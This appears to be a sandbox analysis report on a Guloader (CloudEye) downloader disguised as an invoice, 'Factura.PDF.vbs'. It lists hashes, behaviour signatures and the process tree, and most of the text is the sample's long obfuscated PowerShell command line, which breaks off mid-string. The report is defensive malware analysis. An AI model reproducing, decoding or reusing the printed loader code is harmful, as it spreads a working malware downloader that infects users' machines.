Analysis
-
max time kernel
43s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
30-01-2023 14:36
Static task
static1
Behavioral task
behavioral1
Sample
Factura.PDF.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Factura.PDF.vbs
Resource
win10v2004-20220812-en
General
-
Target
Factura.PDF.vbs
-
Size
330KB
-
MD5
ed0e0f21f05f2cb8532be52cc4662e68
-
SHA1
e1e82fbd824112be8a18053a4c7475b78d64806c
-
SHA256
02912e9095dd8683352dee911328ba880510bc366bf9d4a7a56355328b49e2a4
-
SHA512
32286c555502e5eff6b0fa84d3f5de4953549bf253709deb535682817d4418fb9e7f6513686b42febe58238bbdbc52d604e559c32aeeefd7419f6accd12bf9ec
-
SSDEEP
6144:ryK21aGtlv9NMLTReDutfjc6314t7ByaqOH9YNodCcmyvviq:rt2AclYkulIg12BT9Eo2Od
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 2 1844 WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 628 powershell.exe 592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 628 powershell.exe Token: SeDebugPrivilege 592 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1844 wrote to memory of 628 1844 WScript.exe powershell.exe PID 1844 wrote to memory of 628 1844 WScript.exe powershell.exe PID 1844 wrote to memory of 628 1844 WScript.exe powershell.exe PID 628 wrote to memory of 592 628 powershell.exe powershell.exe PID 628 wrote to memory of 592 628 powershell.exe powershell.exe PID 628 wrote to memory of 592 628 powershell.exe powershell.exe PID 628 wrote to memory of 592 628 powershell.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Factura.PDF.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Saliant = """SlFCruBenTocGetIsithoInnTl BaGAnyrerAnoTrpPriShlPeoFitTu0He Wi{Tr Un Va Ir FrpOpaskrTuaSlmNa(Ca[spSNotForFaisnnUdgAf]Re`$SvTAaoFeeTrrHoeSksNu)Ba;Sp Op Sn Au fl`$EnMFiePttCorRioStpTeoUflSpiAntReaGanNoiAuzSpeTjsKn By=En EsNGaeAlwAn-AnOFobEnjHeeBicFutSi FlbBayIbtZeeSn[Tr]Sk Un(Pe`$KaTXaoAueRerReeassTh.CoLOcefonSygPetFihLi Se/Ld Fl2Ma)Ho;Un Qu Di Ov SoFJeoInrUn(Ul`$foIafnZosTieKorAkaFytGueBotLu=Ju0Sy;In ha`$WrIGinStsReeBirKlaUntEneBitDi bi-UdlButAn Ss`$IdTFuoHyeSorUneSpsBr.RuLKaeKanOrgSttBahSi;Po Be`$tfIAcnVisRaeforCoaFatTyeTatHi+Fi=Re2Un)Pr{Va Gl In`$OvTKoaNolSalTooCutPaeBl Th=Be As`$DeTBaoPueEnrUneLasSa.InSJauulbStsThtParEkiBonLsgCe(An`$ArITrnjisGleDerStaRetCaePetFe,Sn De2Su)Tr;Ty Si Ch Ub Eu Ga Fa No kh`$RoMDreHotAnrDuoRepSaodelBeiJatSmaKlnfoiOlzMeeSksbl[st`$FiIDrnEnsNoeFirhgaFotLaeHatdr/Sl2Br]St Av=Ot Ul[VecFooPrnUsvUnejerPhtju]Ca:Ka:StTCooSyBBryletWoeSe(Ad`$DiTBraNylinlBooHitImeSk,Sk Cl1ha6Ma)om;Ep Ku Ka`$SyMVaePltZirgroBepBeoStlGaiRetQuaUnnPsiTrzSeehusPr[Be`$DoIMcnOmsHeeRirMoaBetReeEltHe/Fl2Cr]Ae De=En Cr(Fa`$CoMBaeVetanrFroFipWaoTalMoiImtDeaConStiKozBaeinsUe[Af`$tiIBenAyspueNorStaFotcoeFotVi/Ja2Le]Pr Sy-ExbcaxStoLirGu Ci2Te4Pe0Me)Bs;Di Un Pr Pr Om}Ge se[UdSBetGyrkoiunnPegBl]Ga[YaSMayBesAftReeHamBo.ShTVeeRexUdtRe.UnEKrnUncBooPedMyiMenHogKe]Sa:Br:KuAKnSOpCBaIPrIRu.ReGPreJetViSSutOrrRriKenTigAn(Bi`$FoMuneRetDirOuoEnpSeoPolFoifatDoabrnPliLyzSueBesaf)Te;Re}Ov`$FoSSupEmiEvrReaUnlRefArjMieNodRaeDyrkoeInnKr0Re=EnGAlySerTrosmpAliQulBeoIntDd0De Ra'TrAPs3th8Me9In8Sp3Un8Mu4ve9Fr5Ri9SnDViDsuEla9sp4Fo9foCHa9BaCgr'Ra;Be`$ReSPopTriTerKraUnlSpfNajGaeRedSueVerEleNanEj1Ar=PrGElyDerInoBupKaiTolsaoSttme0Cu Ch'MdBScDId9fl9Ov9Un3Kr8Bi2St9skFAa8Su3Se9OpFAn9Pa6al8Sa4neDRaEFoATa7dr9Co9Mn9SpEkiCPa3DeCEx2unDsuEFoASe5Mo9UnEPr8Fa3Ut9Ex1In9si6op9Mo5BeBZaEet9Fo1Co8Fr4Ud9An9Ta8Re6Me9Vi5InBstDAr9St5Za8Ch4Ug9me8Fl9NaFPl9Be4Bu8Gr3Un'Dr;Af`$baSinpPsiScrOpaEllWafAnjCoeStdSpePrrFoePrnFl2Re=UdGFoyGrrSuoRopEdiValPuoKatSt0Gr Bu'TeBsc7Ss9ko5Pe8He4AfABa0wo8Sn2Lg9CoFBe9De3FoBBe1Fo9st4Br9ge4Ef8Av2br9Rh5Re8Di3Th8Hy3Co'Fo;Or`$InSFrpMaiPrrMoaPrlRafDrjPreEndToeTyrTeeBonFo3be=ErGSeyWirCeoNopBaiTalBooCotFr0Ro Co'TyADo3Ld8Gr9Ep8Un3aa8Ev4Tr9St5St9DiDUnDHaEAcARe2St8Ek5Sy9HiEUn8Rk4En9So9Ti9VeDIn9Ba5meDbaEOvBEv9Mu9EjEUn8Re4Un9Ra5Sa8Sc2Or9MuFTo8En0EnAIm3Su9Ov5Ru8Ba2Ou8op6Om9Kn9Bi9Tr3La9Me5tr8re3VaDNaEBoBSy8ma9Ju1Am9BaETi9Em4Fr9HiCLo9El5BlAfo2En9Lu5Al9En6Cl'No;Co`$coSFopSpiAprglaSklDufMojSteSpdBeeMirSleKanbe4Pa=RaGMeyHjrEroSopFoiRglPooDatPo0Ae Al'An8Sk3Lo8No4Dv8Un2Li9et9op9JeEBr9Pl7Re'Cr;bu`$KoSMapBoiAlrHeaLulSmfBrjQueBkdfieForGaeFinFa5Gr=HiGSiySprSooLapKiiRylCooDetSa0Mi Ou'BuBBu7Ga9Af5di8Ke4StBRoDDa9BrFfj9Re4Sp8Ou5As9GlCSk9Ta5stBFl8Sl9Hy1Bl9miEBr9Ac4re9MaCBe9Tr5Au'Sk;Po`$TrSSkpIniNerAnaFelPafJujfaeTedBreAfrUneinnKa6ex=LaGTiyThrProoupOpiEklTioHetTv0Re Ou'BoAAc2BlAEn4AmAYa3Ps8Cr0Ul9We5Ta9Va3Nu9Fy9Co9Sp1Ta9RiCPaBTrEEn9Or1Me9DyDRe9Ou5kaDNoCArDan0UnBGe8Xy9Ri9He9Tr4Ch9Re5FiBIn2Ko8Re9TrAUn3Ti9Cr9Li9Ca7TaDGuCFiDBe0VaAUv0Wh8Fo5Fo9De2Fo9BlCto9Ja9Un9Pr3Fo'Af;Om`$koSGrpSuiSnrVraSolTafOvjFrecadReeSwrRaeHonBr7An=ScGadyTirapoTapCoiSulBloKotLi0Ud kr'ClAfa2Sp8Sp5Te9YnEBi8Un4ti9pr9Fo9unDTr9Su5unDExCSkDan0SpBHyDMa9Ve1Bl9FoEOv9Fr1Af9Ka7Vr9Sl5Fo9De4Ho'St;Oc`$UnSDapMeiDerSuaLulRefSujUreCidVieUnrLeeFinAf8In=NeGExyEkrVioBapFoiAflPeoVetNo0Ch Xy'FaAPa2Ch9Py5ho9Pu6Rb9TrCTu9Ud5st9fe3bo8Ha4No9Te5Wh9Ba4chBGo4Ta9La5Tr9ScCTe9Og5Da9Ve7Pi9Be1Fo8Fr4Sa9ya5Vo'Mu;Cu`$VaScapBeiSprKoaEklDufPujAfeDedMoeUnrLieconDo9Tr=InGInyBrrProTipMeirelBaoSktGr0Du Fi'PrBSv9Hy9KuEPrBCyDPo9Sp5Te9BiDbr9SeFUn8Ab2Sn8De9ReBHiDTr9BiFVa9Fo4Pe8re5Cr9BaCMe9Fl5tu'Le;An`$YsMUnoTarAfiUtcavhMoeBa0ho=naGTeyGrrPooSppUniAflTioChtve0Da Co'JaBGlDTu8Ab9FoBOp4Al9sv5Sp9BuCAu9pa5No9At7Ag9ma1Ca8Re4Ps9Cr5caAHe4Di8sp9Mu8Je0In9Ca5se'Ex;te`$NeMCloDirFlitacKuhPoeKe1Ba=HeGFlyRrrPooMopEriSmlspoIntHy0ly Mc'RuBfl3Fe9AnCGn9Pe1Pl8sa3Vb8Tr3LiDflCMoDBe0ApAIn0Kn8Su5Gu9Hi2Ni9RoCSk9Sv9Fr9To3LyDSaCFlDSi0BuAKa3In9Ar5Di9Ba1Ma9FoCRa9Ja5Po9Ti4DeDSeCkeDAt0VaBSt1Lt9TrEHu8Sk3lu9Im9UnBWi3Co9EfCBa9No1Bo8Re3In8sk3SuDBaCBaDKl0MoBin1Th8No5La8Ts4Ra9ddFkiBFe3Th9UgCSi9Fa1Ar8Az3Ut8Ch3Ju'Sp;El`$PhMVioScrBoiSmcExhTfeSe2Ve=BrGUdyFerShoKupBaiVelspoSttNa0Hl No'FoBIn9ch9ElEMe8Te6Ca9InFSn9MiBre9El5Ve'Ta;To`$stMGaoTrrGiiAdcEnhaneEn3we=PaGLayInrAnoBrpHeiHelChoQutRa0St po'PoAAr0Te8Yp5Ir9Sc2Pe9ApCHe9Ha9Ko9Ri3CoDRiCprDSk0DeBRi8Su9Ta9rh9Tr4St9Ra5FaBEf2Fl8Pr9BeAMd3Do9Pe9Ex9Su7BeDDaCStDTr0SiBKoEMo9St5Sl8De7JoAGa3In9PaCen9CeFTp8Li4SkDApCInDFe0BrAkr6Sq9St9ba8Vo2De8He4Sv8Ra5Ea9In1Gr9OvCDe'In;Fo`$EfMGeoIsrSeiSicRehDeeIl4El=EjGBeyPhrEkoMepAniDrlSpoSktNe0Ud Op'FoAIn6Uv9Di9Sl8Ch2Af8Ra4Fe8Ka5Gy9Co1Sm9TwCkoBAr1ca9GeCsp9TaCUn9RaFLe9su3Ou'Ra;Vi`$PeMBloHvrpliMacDahSneUn5St=MeGRiyKerBaoSnpNaiImlRooMutHe0Ps Om'El9CoEAw8Pu4To9Ci4Un9EgCUd9DaCPl'As;be`$UdMHjoPurSmiarcSkhLeeFe6Ov=beGHyyTorFooCopPliFilJaoFatYn0Fi Sp'RuBMoECa8Su4BoANo0Sc8Ca2St9LeFDe8Ch4Fl9Sh5so9Ov3Du8Ep4BaAFl6Ku9As9ci8Ko2Ma8Ha4Ch8Sp5Ch9Ko1Br9LaCPrBBlDBa9Hu5un9BaDUn9SuFAd8Un2Sw8Be9ud'Fu;Fa`$LoMLaoChrGeiMocRehDoeSe7To=UnGAsyLarOroMapFliBelPeoaetTs0Kr ac'IcBCr9osBNy5SvASh8so'Fo;Ad`$BeMSuoblrOriPlcKuhKreDr8Ad=BaGFlyHyrPeoNepSaiBrludoMetFo0Me Ar'UnAExCMa'Mi;Re`$MyAChgSuuBrrBokFaeDerStnaceApsMo=BkGNayturstoUnpSviEnlShoTrtIn0Re Cl'ChASc5StADr3scBFo5PaAKr2UnCSc3LiCgr2An'Sk;Ma`$SkGDiaSclUduwicskhScaChtVa=SoGCuyLarEcoPepKiiEnlAlokatMa0An Mo'PsBIa3Fi9Wr1Ve9FeCBr9PaCReAFo7la9re9Do9HyEGa9Py4Pi9KlFOf8Te7WiAOl0Ra8Li2Le9SjFHj9Fo3SlBAw1Mi'As;hjfTeuAnnTvcSttUtiSmoBrnAd ArfSukSupSv Al{AfPSeaStrOpaZomAn Lo(Ar`$krBSeiGrnHaoPamCoiUnaEllCekinoKiepufAufKoiRecDiiFoeranVatRaeAqrPr,An Ba`$VaLSpeLavnoestrGliTunIggUtsInoTrmmekTeoJasHjtAunChiGrnDogSt)Fl Se Di Pe Ta Av;Ud`$IlFSerSteKemOvsLykForDwiIddRatDisPronopDatFoiKamFoiOvsKomTremynPo0Te Mb=CoGBoyDirHyounpHyiEklHeoKvtOr0ra Un'DiDTv4FaBUnBPo9Sk1Ku8Le9ho8Mu3HoDRh0JaCGrDDyDTr0LuDCe8CaAAtBThBSg1Ag8Sl0Ki8Fa0HaBMd4Zy9UdFPr9PuDLu9pa1Sh9Ma9Bo9HoETaANoDSaCAsABoCRiAOlBVe3Un8Df5No8Bo2Ho8Di2jo9Fi5Bu9MeEAg8Pa4BlBin4St9ChFFl9UnDAc9Du1Un9Me9Ho9EjEMeDMaEEkBCo7Be9Sa5ha8Pl4R BFr1Fe8Kr3Wh8Ya3Li9An5Di9SuDTe9Di2be9SpCFl9Eu9Ma9He5Fo8Ca3StDFa8CaDGe9GrDAt0Is8BiCSyDTa0HeAAt7ph9Ud8Ty9Do5ti8Ma2Un9Sk5KaDBaDCoBUdFMu9Ju2Ne9reAEp9Dr5Bu9Ca3Ee8No4KlDpu0gr8MyBTrDUd0SkDUs4OvAHiFOvDSaESaBKa7Do9DiCGe9UnFCa9Sm2Un9De1Bu9KaCReBVe1Ca8Fa3Et8Ke3Me9Sk5Me9ebDTh9An2ba9SyCBl8Co9AqBTh3Pa9Ma1Te9Es3Sn9Ba8Ko9Be5SoDTr0alDAlDTvBRe1Gr9PoELe9Za4PoDGi0NiDCo4AnAPrFWoDKlEUnBNaCFy9unFCo9Mi3Co9Su1Sy8sa4Sp9Gy9Bi9CoFRe9PiEsyDPlEKoAOp3Gu8Sp0Sc9OvCTo9de9Co8pa4haDEn8AfDWo4ClBTrDPa9FyFLn8St2co9Pi9So9Sc3Sl9Ud8Un9Fr5SeCsc8meDSt9UnAelBToDRuDFrCDi1OfAInDunDFoEKaBAn5De8Op1F 8Pa5sp9Sn1Br9doCRe8Da3TrDSe8InDGi4DeATh3En8Ha0Ci9Se9Af8tu2Ar9Br1Vk9MyCFi9Fo6Sp9FuABo9To5Bl9Ow4in9Ov5Si8Au2Pr9Me5Wr9trEDuCsp0BlDVi9SaDFo0Th8OvDEtDBo9ImDBuEXaBSp7Gi9St5Me8Up4RaAsu4Af8Si9Ci8Re0Gr9Sl5UnDSa8SkDKa4BeANi3Mu8My0Fo9Su9Se8Sa2De9Ae1st9EtCSh9Tr6Ba9TaABr9Ma5Hy9Sh4Je9Tr5Ba8in2Ra9Di5Ch9BiESuCMe1UnDTe9Ma'Re;Il&Sk(St`$FaMInoNerCoiHacTihNeeUr7Wa)Ny Te`$SkFInrBueCumPasSpkInrboiFadUdtWasKroDepAqtQuiComKoiBusEgmSueAbnAn0fa;Ta`$anFKrrvaeHymEnsTekVarNiiTrdWatScsAfoRapBotUniBimFoiOesPhmMaeLanMo5Rh In=La AnGViyPrrVioLapgriPrlFioTotAm0Co St'NeDSu4ReAFe3Ch8Pl0Sp9DiCGl8An5Te8Ko4Ur8Tr4to9Mg5Fl8Ho2In8St3SvDCa0LoCCeDRaDTh0CoDud4KlBUnBge9Va1No8Er9Fi8Da3TrDOrESeBMo7Pr9Dr5Me8At4ImBPrDDd9Su5Sp8Me4Sy9Al8En9SpFKv9pl4AuDAe8UnDPi4DoALi3Vi8ki0Ka9Re9Un8Br2Da9Tv1Co9guCAm9Pr6Ar9TrASa9Un5Ta9Sa4Bi9Se5En8St2St9Kl5Ul9BjEPaCNe2BoDToCHaDAr0TiAOsBMeAFo4Mi8Pl9Al8No0He9Pa5TiAAnBCyACrDReAtrDJaDDe0SuBMa0BrDAk8LiDFl4TeAEr3Dd8Ri0Bu9Re9Mu8Ba2To9Ne1Kr9ImCBr9An6Ar9KbACa9Gl5Sq9Ca4Ch9Sk5Ps8De2Sl9Ca5At9BuENoCSt3RiDStCFaDCe0FoDAs4GiAFa3Ta8Br0An9to9br8rg2Va9Sp1Rr9CeCNo9Bo6Be9AmAUn9sl5Al9Sa4Oa9Ve5To8be2Wr9Fa5Do9SnEPlCPr4BaDKn9caDFr9Hy'no;Ar&Da(La`$SoMNuoHjrTeiBucKohAneLi7No)Co Fo`$OdFFirAfeDemIgsgakSprbeiExdIntCasEtoSnpFitMoiFumMeiOvsLomAreAcnse5St;wa`$EtFBerMoeUdmCosLikforSkiKndHutDesPaoGupPitDeiJimkoiLasGrmTyeOvnMa1Gu Ba=Un EfGTeyVarKloRhpMeiCilTuoAatAr0Ba No'af8Be2mi9Li5Ch8Vi4Lr8Kr5St8La2Af9SkENeDVe0AlDDu4ShAFo3Di8Ps0Ch9poCmi8ar5ba8Re4Ch8Ba4En9tr5Ca8Fo2Ar8pi3fiDprEUpBSt9Be9urEHf8Ka6Qu9NeFFu9noBEf9Sc5udDEp8anDBr4Un9PlEHe8Su5Qu9SpCIr9ViCTeDMaCLiDPa0SpBBa0FiDDo8FoAMaBFoAUs3An8Ra9Cr8Vi3La8My4Lo9Op5Gu9ReDHjDUnEBvAaf2di8Si5Ru9NoEAf8Af4Lo9Ov9An9InDRe9Ab5SpDUnEInBEn9ni9JeEAu8Dy4St9Ne5Ga8Bi2Be9SkFDy8Un0SpAUn3St9Ho5Ha8Pa2Br8Bu6Sk9ra9Su9Li3dr9vi5Re8Wo3AnDDiEVgBLg8Dr9An1De9SaEec9Ma4la9FoCFa9Ch5UnAGy2at9Fl5Ch9Vi6AvAApDReDDy8AcBAgEHu9Pu5Pe8Dd7PoDFoDStBEcFHy9Op2Tr9AfADo9Ti5Ro9Bo3Ab8Hl4LaDRa0SkALe3Kr8Im9An8Di3sh8Vi4Lu9An5Pt9ClDteDLiEBrAEc2na8hn5Ti9BiETi8Ul4Ab9Oe9Pa9DeDAn9Il5StDApEBaBSo9Fo9ElECh8Is4St9Mi5Ra8Ho2Fu9PrFBu8Ac0FaAVi3Un9Po5Uv8Un2Ry8St6Re9Ar9Un9Fy3Re9Co5Ph8Ac3SaDPrEBaBRe8Sh9Af1Fi9BeENe9Ar4So9SeCDe9Tu5hyAmi2Ud9po5Ti9Ca6CuDMa8BlDSt8UdBDaEVa9Co5Le8Mo7MiDDeDOlBduFPa9Ge2Od9MeAce9Sa5Em9Ti3Sa8bo4KiDAn0ViBWo9Kh9UsEka8As4ReAWo0Di8Fa4Am8In2SkDHo9HeDUnCkyDEl0ThDSm8ViDre4LeBBeBSl9Co1Ga8To9Se8Me3SkDUdEMyBDa7fi9Ug5Pa8Tu4peBWeDBr9Pi5Es8Sp4Ca9Bl8Ca9LuFJu9Af4UnDTa8FoDEk4BeAUs3Tu8In0Fl9Sh9Ap8Cr2He9So1Bl9HjChy9Va6Br9ApABe9Re5Sy9Du4Pr9Sv5ch8Fe2Un9Pr5Sk9NaEApCFo5LoDLs9SkDGr9ElDPrEStBBr9Pe9maESu8He6Bl9FoFEr9RdBCu9Bo5PaDUl8BaDFu4Ti9PeEFo8Fr5Al9MeCSe9ErCStDOlCTiDDr0VaBFo0PrDMi8seDKr4EfBDi2ap9Ta9Un9PrETj9FuFtu9ErDPi9Aa9Fo9di1Bo9ClCEf9KoBKo9PrFge9Fi5Gi9Re6Ve9in6He9Fa9Al9Jo3Ee9Co9Su9Bu5Pu9AfEUn8Tr4Su9Kl5Re8It2PyDIn9AjDNo9InDKr9DuDLa9KvDPrCElDGe0KaDTo4reBMeCCo9Gr5Hy8St6Ud9To5Sm8Fi2Bo9In9Pl9coEHu9Ka7Te8De3Co9OvFTr9FaDBo9JeBly9FaFSp8Pi3Re8Du4Br9PrETy9Ko9mi9MiEFo9Ri7FeDKw9MeDDa9Mu'Sh;Fe&ne(Sa`$KvMSkoTirPhiStcPehsoeUs7In)Un Ve`$MaFHyrCoeDrmvesPokSarLyiAcdAmtMasOmoFepOmtBiiAnmSkiOpsflmDeeCinAn1Ui;Ga}MufBeujenOvcactWriUdoBenJo ShGKaDunTEl Da{MiPUpaVarBeaUnmTi Ki(Be[BePMoaHirLiaCamCoeBrtKoeRirNe(taPvaoUbsFlisktReiCooSenRe Su=No Ti0Li,An ViMStaSknDidBoapetAloAfrEvyCa Mi=Sp Di`$UnTPrrSluKieCh)Tu]St Ca[EcTGoyVapCieBe[Kr]Di]Po An`$TlSCatScoSpnOpetrfOviInsClhBeeApsBa2Ti2St,No[slPStaBrrBoaSjmFaeMttTteDirTa(CiPScoDisTeiSctHjiLioSynSm Re=Fi se1Ra)Ho]Li An[StTHiyAfpPieSt]Os Mi`$VeRgteavaDrtSptDoaHmiChnShmReeBrnLatal Ty=Ta Ga[FlVNooJaitudEs]Pr)Ne;Ud`$DoFSkrOueBemensLakDrrDiimydKutChsYdoMapMetBjiBomTyiVasComDeeVinGa2Fo Cy=Ch AfGLayNirkvoFapOpiFolPioketMg0He Ku'imDGr4De9PaEAf8Pa5No9PeCMa8Ku0Ri8Po5Da9OlEVr9HeBDe8Op4An8co3Di9PeFVe9AcDIm8En2De9De1An9Oy1Ch9Lo4Di9ud5ToDIn0InCClDnoDSo0ChAJuBOoBse1Me8Oo0Ha8Be0KiBRe4Br9AmFRe9plDBr9Ov1Bi9Ke9Ca9JoESlAOmDBiCDeAKoCAnAGaBBe3Ro8Ti5Ps8Mi2Pr8Se2No9Un5Bo9coEKa8Re4TaBTe4Di9WoFsp9unDFl9Pc1Im9Be9Fo9OrESuDInEFoBSi4Ru9Ko5Il9Fu6Ic9Ho9Ca9SiEHy9Sa5CuBha4Im8Ba9Fl9OvECu9Po1Se9FeDCa9Hu9Sp9Ge3StBPr1Ma8Un3Fo8Qu3Ma9Sn5Ta9daDTs9Ne2Be9VoCBa8ku9maDSy8ShDSk8UnBChEOp9Sm5As8Pl7SlDAnDBrBsuFBi9Ap2Se9ReASt9Da5Sv9Sk3Ci8Op4ReDSi0PrAMi3Co8ex9At8Al3Sy8Ya4Mo9Ov5Fo9LaDMaDBeESkAFa2Fr9Li5On9Op6Su9DaCSk9Ma5No9Se3Da8Sp4Qu9Ba9Re9FaFAc9SpEBoDSkETiBFl1Mo8Mi3Ad8Fj3Ke9Dy5Fr9StDOp9Un2Pe9PeCFe8vi9LaBRoEFl9So1Un9CaDMe9Fo5woDCo8LeDQu4FaAVr3Ge8Ta0Sw9Re9sa8Fa2In9Gi1Pr9AfCBa9St6wo9ToABl9Bu5In9Mo4Ti9Un5Nu8St2Ul9Fa5Fa9GrEHoCLu8meDGl9HyDNu9IcDBeCTaDTn0LuALeBLiAGi3Ja8La9In8Jo3Fr8Da4He9Pa5By9UnDLeDKuEUnATu2in9Fo5Ju9Be6Ai9foCSu9Fo5ma9Ud3la8Dr4Af9Pu9Nu9DeFFe9ViEDoDRaEWrBSa5Mo9SuDAf9An9Te8Pi4BeDFuEUrBRe1St8Ma3Ar8Ra3Hj9In5Em9LaDFr9Vi2Uf9PrCSu8Zi9PaBOm2Ce8No5Ti9Sv9Sk9TaCSu9Bu4No9De5Ul8An2EfBQo1nd9Sp3Kn9Pr3Fr9tr5Ub8Un3Ba8Ma3TeABrDkrCKoAndCCoAHiAbr2Fo8Th5Gl9TrEBiDgy9MeDopEGuBDe4Sa9Se5La9Ko6Ra9Sk9Sk9NeESi9bu5InBEm4Re8Gl9Ca9SpESn9no1en9ReDPl9Ma9co9Un3udBTaDEj9raFEq9Am4Jo8Ka5Lo9LoCSu9su5moDBe8StDNa4FlASt3Se8Pr0Gs9Ve9Ph8No2Du9Hu1Ca9chCSt9Fa6Re9UnASt9Ha5do9Su4Va9Al5Ka8St2Hy9Ar5Du9DiEInCOr9DoDPrCAcDDe0upDCa4Ch9As6Ba9St1Na9CrCDu8He3Re9Di5AbDOr9HeDUnESkBNo4Tu9Re5Me9Ko6Na9St9Sc9odECe9Ri5veAKn4Hy8rh9In8Di0Po9Sk5AnDUn8NoDPa4reBGiDSt9LeFRe8Th2Ey9Ch9Ap9Me3Ja9Pu8Hy9Tr5LrCIn0TiDEnCauDMa0GrDLi4SiBKlDMa9FoFHo8Fl2St9Ec9Ru9He3Se9Ki8De9fs5GaCGl1RuDMiCEsDAd0SpAReBTuASi3Sh8tr9Gl8Ur3Or8Ti4Ou9Id5Sk9FiDAcDHjEHyBFiDEv8Dy5Hu9OuCIn8El4Sv9Le9Ve9Ci3Ej9Fo1fo8Pa3Un8Sp4SkBBr4ph9Go5De9PoCfl9Un5An9Ru7Sj9De1So8St4Cl9Lo5deALaDFoDme9Tr'Mo;Ca&Fi(mi`$MeMKnoDerEliKocflhSaeHi7Hj)Se Sh`$GeFOnrsieAnmBosPakAcrUnicadHetNosBaoKlpEktUniUnmTriStsMimYaeAanKo2Ma;Fa`$ToFGurKaeLemResEnkAnrDeiAadKetFlsNioBipPatDiiDrmEliKosPamSneSmnSk3Bu Ma=Uh FaGseyParCooSkpDuiMalShoGutFr0Tr Fl'RnDSt4Am9FoEEk8Du5Ti9NoCak8Ba0Un8Bo5Da9ouESa9HeBLi8Fo4Ju8Fa3Sm9GrFca9ImDFr8hi2Re9Un1At9Li1En9Sc4Fo9mu5MaDSeEUdBPi4Un9Ks5Mo9Sy6Af9Po9Tr9inEDo9Pr5ReBGn3Tr9KoFKo9GrENo8en3Gr8Pl4Ab8Da2un8Dr5Ur9Tr3De8Us4Sj9SnFNo8Ve2ToDHm8RiDLn4DrAKe3Li8De0Ba9Fo9Si8Do2Sk9Tu1Ku9TrCSj9Io6Th9KkAMa9Ge5Mo9Fi4St9He5We8Sc2No9Sk5Mo9GuEprCRe6SnDTeCStDUn0UnALaBHeAOm3In8Ni9Sk8La3Af8Sw4dr9Yo5Pr9SeDMaDKoEUnAMa2Tr9Di5Sp9Ri6Br9CyCSa9Ps5Fr9Ma3Di8Pa4Sa9Co9Ra9SoFKr9thEInDMoEMuBFo3Ro9Ud1Pa9UnCAf9FoCTr9Re9Me9NeEAf9Ap7LaBSl3De9HeFIn9UgEDi8An6Be9St5Su9VaERa8Di4Re9Ui9Co9TiFAl9FlEGl8Ti3SyAChDNaCInACoCPrADiABa3Af8bo4Il9Gl1Ja9SuEre9La4Pr9Ac1Ac8ne2Pe9Se4CaDEnCSyDha0VaDSp4RoATr3Ho8Vo4Ko9FeFBr9GrEMy9Be5In9Ca6Au9Ko9An8Se3Ax9De8In9Dr5Sc8Tr3ToCKr2DiCTa2SeDHu9HeDTrEspAmu3Tr9Cu5Un8De4FrBKo9Sv9DiDIr8Py0Hi9EnCDh9Un5Ka9RoDOv9da5Pe9BaEGe8Dr4Sc9Pr1Mi8Mo4Pa9Ge9De9SeFDy9GsEStBsu6St9DeCOb9ag1Op9He7Po8Ra3AlDBu8MeDUn4DeADd3Mo8In0Vo9Fo9Tr8lk2Ac9Ko1No9SeCBr9Fo6Me9AeAse9Pa5ph9Ov4Po9Pr5Sk8Fe2Go9Ge5He9soEAcCTh7InDko9Ch'Te;Bi&Po(Re`$BuMInoSlrDaiUscMuhMeeIn7Se)Ca By`$FaFLerOreSumTusVakLarAsiDedTvtpasDroFapSutStiOvmSyiArsInmMieBinPa3Bu;Pa`$RoFChrLeeKamAssHakNororiLodDrtSusIcoOtpFotAsiWimbjiKisOvmAreSenPr4Ch Fo=Va UnGCeyGerVioVupDyirelSvomrtMa0Fo Tu'saDsp4fr9FoEBl8Af5Su9ExCyn8Ed0Mn8Pa5Ti9reEUf9rwBbu8Cr4Bl8Bu3Tr9LaFIn9NeDBa8Pl2Pr9ov1De9he1St9Po4Te9Jn5ScDesEAcBFr4au9An5Tr9Me6Ov9In9No9SuETe9Af5MyBUnDgu9Vi5Eu8Ce4No9Ko8Br9FoFAv9Ou4ToDLd8PeDgi4wrBtiDso9InFsp8Ca2Ba9In9Lu9Pt3Na9Ce8Pa9Fo5OvCAs2beDUdCSaDSt0ReDSp4MaBslDMa9BaFMo8Mu2Xe9Hi9In9Ga3In9Ic8Re9tr5HeCHo3TsDMaCEgDTa0RuDex4SaARe2Re9Sa5Ot9Fc1Na8No4Ov8Pr4Er9pa1Fa9Un9Le9UnECo9UnDSe9Fo5Ti9MoEEu8Pe4EbDLiCRiDKr0DeDOr4JaAVa3In8Kn4Ud9FiFDe9CoETh9Ho5Fr9Un6Ko9Eu9Ge8Va3Sk9To8sa9Ho5Pn8in3miCSp2DoCKa2fiDEn9CoDLaEToARe3Un9Sp5Po8Da4ScBLe9Dy9NoDAf8Un0Pr9UnCVe9Sk5Gr9TeDSa9Da5Pr9spEPo8Va4Er9St1Li8Op4Ho9Oc9re9SnFFr9VaEDoBUn6Ki9FrCde9Si1Do9Ci7Cl8Bl3KeDSk8StDUn4OrAGa3Un8Wa0Gu9Sl9Ba8Br2Be9No1Sk9RaCSm9Dv6Af9BrACa9La5Br9In4Ki9Fu5Ha8ex2Ge9Re5Re9FoEMiCci7NeDSi9Sk'No;Fj&Bo(Ga`$FoMPgoLirGeiStcAvhsceIn7Mi)Br Lo`$LoFhurPaeMamCosSckTrrTjiFedRatPssunoDdpSktStiBemUniousPsmSueKunSa4Pe;Re`$TaFPirBleThmHisbekprrStiMadMitSusPuoTipGrtOriBemHaifosUkmMaeAnnoc5Sk Sk=Pa HaGSuyadrTroJopUniSllTooOrtbl0Ta 